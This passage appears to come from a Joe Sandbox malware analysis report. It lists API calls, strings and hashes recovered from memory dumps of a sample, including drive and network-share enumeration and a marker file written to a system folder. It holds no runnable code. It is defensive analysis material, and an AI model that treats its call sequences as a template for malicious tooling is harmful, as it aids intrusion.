                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 00411B1E
                                                                                                  • timeGetTime.WINMM ref: 00411B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                  • timeGetTime.WINMM ref: 00411B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00425141
                                                                                                    • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                    • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                    • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                  • __mtterm.LIBCMT ref: 0042514F
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                    • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00425174
                                                                                                  • __initptd.LIBCMT ref: 00425196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0042594A
                                                                                                    • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                    • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                    • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                  • _free.LIBCMT ref: 00425970
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • __lock.LIBCMT ref: 00425989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                  • _free.LIBCMT ref: 004259C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                  • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                  • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                  • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                  • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                  • API String ID: 2102423945-3653307630
                                                                                                  • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                  • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                  • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                  • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                    • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                    • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                    • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                    • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                    • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                  • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                  Strings
                                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                  • API String ID: 3123740607-798102604
                                                                                                  • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                  • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fprintf_memset
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                  • API String ID: 3021507156-3399676524
                                                                                                  • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                  • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                  • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                  • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                  • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                  • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                  • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                  • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                  • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                  • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                  • _memset.LIBCMT ref: 00410C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                  • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                  • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                  • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                  • _strlen.LIBCMT ref: 00441734
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • _strnlen.LIBCMT ref: 004417BF
                                                                                                  • __lock.LIBCMT ref: 004417D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                  • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0043B70B
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _free.LIBCMT ref: 0043B71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
